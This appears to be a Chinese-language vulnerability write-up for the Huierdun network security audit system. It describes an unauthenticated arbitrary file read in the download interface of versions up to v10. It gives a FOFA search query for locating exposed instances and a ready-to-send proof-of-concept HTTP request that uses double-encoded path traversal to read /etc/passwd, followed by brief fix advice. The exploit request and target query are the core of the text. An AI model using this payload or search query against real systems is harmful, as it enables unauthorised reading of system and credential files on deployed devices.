0x01 產品簡介

惠爾頓網絡安全審計產品致力于滿足軍工四證、軍工保密室建設、國家涉密網絡建設的審計要求，規范網絡行為，滿足國家的規范；支持1-3線路的internet接入、1-3對網橋；含強大的上網行為管理、審計、監控模塊；用戶訪問功能，內容過濾功能；流量控制功能、帶寬管理功能；增強的應用安全擴展；強大的應用協議分析與報表功能。

0x02 漏洞概述

惠爾頓 網絡安全審計系統download接口存在任意文件讀取漏洞，未經身份驗證的攻擊者可利用此漏洞讀取系統內部敏感文件及憑證，使系統處于極不安全的狀態。

0x03?影響范圍

version <= v10

0x04 復現環境

FOFA：app="惠爾頓-網絡安全審計系統"

0x05 漏洞復現

PoC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

讀取 /etc/passwd 文件

0x06 修復建議

關閉互聯網暴露面或接口設置訪問權限

升級至安全版本